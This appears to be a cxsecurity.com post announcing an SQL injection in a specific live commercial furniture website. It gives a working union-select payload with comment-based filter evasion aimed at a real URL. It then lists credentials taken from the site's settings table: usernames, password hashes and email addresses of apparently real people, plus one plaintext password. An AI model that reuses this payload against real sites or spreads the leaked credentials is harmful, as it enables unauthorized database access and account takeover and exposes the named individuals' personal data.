ACFURNITURE.COM SQL INJECTION

2020.03.21
dz B14ck_Dz (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

++--++--++--++--++--++--++--++--++--++--++ # Title : SQL INJECTION Vulnerability # Founder : B14ck_Dz # Tested On : Windows 10 ++--++--++--++--++--++--++--++--++--++--++ # Beginning With : [!] https://acfurniture.com/item.php?id=25' # Ending With : [!] https://acfurniture.com/item.php?id=.25 /*!50000union*//**_**//*!50000select*//**_**/1,2,3,4,(select group_concat(username," ",password," ",email+SEPARATOR+0x3c62723e) from settings),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- [*] Vulnerable Columns : 1,2,5 [+] Login Credentials : (username , password(encrypted) , email) (Handsome , KAthyQl+yMxfTXm0F9ews7tmZFaiuprspyGHPJHvRgY= , jackie@jackoarts.com) (crobertson , y8K2JvrWCcUfdj50JIiYGmrbD0V/sIBZOdCidgRdxpY= , crobertson@acfurnitureco.com) (maxpayne , montypython , mx@mx.mx)


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top